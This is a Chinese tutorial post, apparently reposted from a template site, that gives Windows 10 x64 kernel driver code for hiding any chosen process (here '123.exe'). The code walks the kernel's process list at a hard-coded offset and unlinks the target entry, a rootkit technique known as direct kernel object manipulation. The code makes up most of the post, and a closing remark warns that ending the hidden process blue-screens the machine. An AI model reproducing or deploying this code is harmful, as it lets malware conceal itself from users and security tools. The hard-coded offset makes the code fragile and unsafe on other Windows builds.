了解原理
流程:PsInitialSystemProcess(进程HeadList) —>给出进程名—>0环实现进程隐藏文章来源:https://www.toymoban.com/news/detail-568495.html
驱动层代码—0环
#include "ntifs.h"
#include<wdm.h>
//extern PEPROCESS PsInitialSystemProcess;
NTSTATUS DriverUnload(PDRIVER_OBJECT DriverObject)
{
DbgPrint("Driver Exit \r\n");
return STATUS_SUCCESS;
}
UCHAR* PsGetProcessImageFileName(PEPROCESS Process);
PEPROCESS ProcessObject;
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING Regedit)
{
//遍历进程
PUCHAR szProcessName = PsGetProcessImageFileName(PsInitialSystemProcess);
PLIST_ENTRY BmpList = { 0 };
BmpList = (PLIST_ENTRY)(((PUCHAR)PsInitialSystemProcess + 0x448));
BOOLEAN bmp = FALSE;
DbgPrint("szProcessName %s\n", szProcessName);
for (;;)
{
BmpList = BmpList->Flink;
szProcessName = PsGetProcessImageFileName((PEPROCESS)((PUCHAR)BmpList -0x448));
DbgPrint("szProcessName %s\n", szProcessName);
if (strcmp(szProcessName, "") == 0)
{
bmp = TRUE;
return STATUS_SUCCESS;
}
if (strcmp(szProcessName, "123.exe") == 0)
{
//DbgPrint("找到了");
break;
}
}
//隐藏进程
BmpList->Flink->Blink = BmpList->Blink;
BmpList->Blink->Flink = BmpList->Flink;
DriverObject->DriverUnload = DriverUnload;
return STATUS_SUCCESS;
}
测试截图
加载驱动前:
加载驱动后:
文章来源地址https://www.toymoban.com/news/detail-568495.html
隐藏了进程123.exe
注意:如果此时直接关闭隐藏进程会导致蓝屏。
到了这里,关于windows10驱动 x64--- 驱动实现隐藏任意进程(四)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
